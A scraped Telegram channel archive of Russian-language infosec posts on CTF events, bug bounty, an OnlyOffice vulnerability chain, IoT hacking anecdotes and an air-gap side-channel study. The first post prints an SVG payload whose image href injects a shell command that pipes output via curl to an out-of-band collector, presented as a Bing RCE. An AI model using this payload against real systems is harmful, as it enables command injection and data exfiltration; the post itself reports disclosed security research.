k3vg3n ch
Open in Telegram
Логи мыслей. Об информационной безопасности (CTF, багбаунти) и не только. Все материалы, опубликованные на канале, предназначены исключительно для образовательных и информационных целей. Автор не несет ответственности за любые действия.
Show more832
Subscribers
+224 hours
+37 days
No data30 days
Posts Archive
832
<?xml version="1.0"?> <svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"> <image href="|id | curl -d @- https://[OOB-COLLECTOR]/output" width="1" height="1"/> </svg>Всё. root в bing. https://xbow.com/blog/bing-images-rce-vulnerabilities
832
Гугл хочет принять странное решение ограничить установку приложений на android, петицию против подписали уже более 200 000 человек.
https://keepandroidopen.org/
832
Наш канал становится популярным — появился фейк-бот, мимикрирующий под k3vg3n_ch.
Хочу отметить, что мы не имеем отношения к данному боту и другим возможным фейкам.
Официальный и единственный канал в телеграм — @k3vg3n_ch.
832
Repost from DUCKERZ
На 1️⃣2️⃣3️⃣4️⃣5️⃣6️⃣7️⃣ открылась регистрация на Пляжный сезон!
Пляжный сезон стартует на нашей платформе уже 2 августа и продлится до 31 августа. Этот сезон пройдёт в формате турнира на выбывание с дуэлями 1 на 1.
Регистрация участников на основной этап сезона будет открыта в течение недели, с 15.07 по 22.07. На основании заявок будет отобрано 16 человек, которые будут участвовать в турнире. Все дуэли будут проходить в прямом эфире, участники будут решать задания в реальном времени и транслировать экран, а ведущие комментировать происходящее.
Для участников, не прошедших отбор, а также пользователей платформы, не подававших заявку, во время сезона будут выложены отдельные задания, анонс которых будет проходить на стримах. За решение этих заданий предусмотрен отдельный призовой фонд.
Спонсором сезона выступает 🐂 BI.ZONE Bug Bounty
Призы за турнир:
🐥1 место – мерч от BI.ZONЕ Bug Bounty и секретный суперприз
🐥2 место – мерч от BI.ZONЕ Bug Bounty и DUCKERZ
🐥3 место – мерч от BI.ZONЕ Bug Bounty
Призы за сезонные задания:
🐥 1-3 место – мерч от BI.ZONЕ Bug Bounty
Подать заявку на участие:
👉 Регистрация 👈
🐥 Канал | 🐥 Чат | 🐥 Платформа | 🐂 Спонсор сезона | 🪲 тг канал
832
Repost from MEPhI CTF
Команда исследования уязвимостей BI.ZONE обнаружила цепочку OnlyShells в OnlyOffice,
позволяющую получить шелл от NT AUTHORITY\SYSTEM при открытии специально сформированного файла.
Уязвимости мы нашли ещё в 2025, но долго ждали пока вендор всё исправит.
Мы написали статью с подробным описанием всех уязвимостей из цепочки.
832
Во время пайки к UART забыл отключить питание и прошелся по контактам чипа.
Что-то щелкнуло, померещился дымок. Ребутнул — светодиод состояния вроде горит.
Теперь у меня камера Шрёдингера.
832
Лотерея, как там её....IoT девайсы.
Ещё, ещё одно устройство, и там точно будет такоооой баг, баунти от которого покроет все N ранее купленных умных колонок.
832
OtterSec выделяет $100 000 на сохранение CTF в эпоху ИИ.
Компания может выступить спонсором соревнований, где введены методы борьбы с ИИ.
Ещё в статье проведен анализ формата jeopardy до и после появления LLM.
Советую прочитать: https://osec.io/blog/save-ctfs-fund/
832
Исследование от китайских студентов.
Программа на изолированном хосте преобразует данные в незначительное изменение цвета пикселя, что сильно сказывается на электромагнитном излучении кабеля.
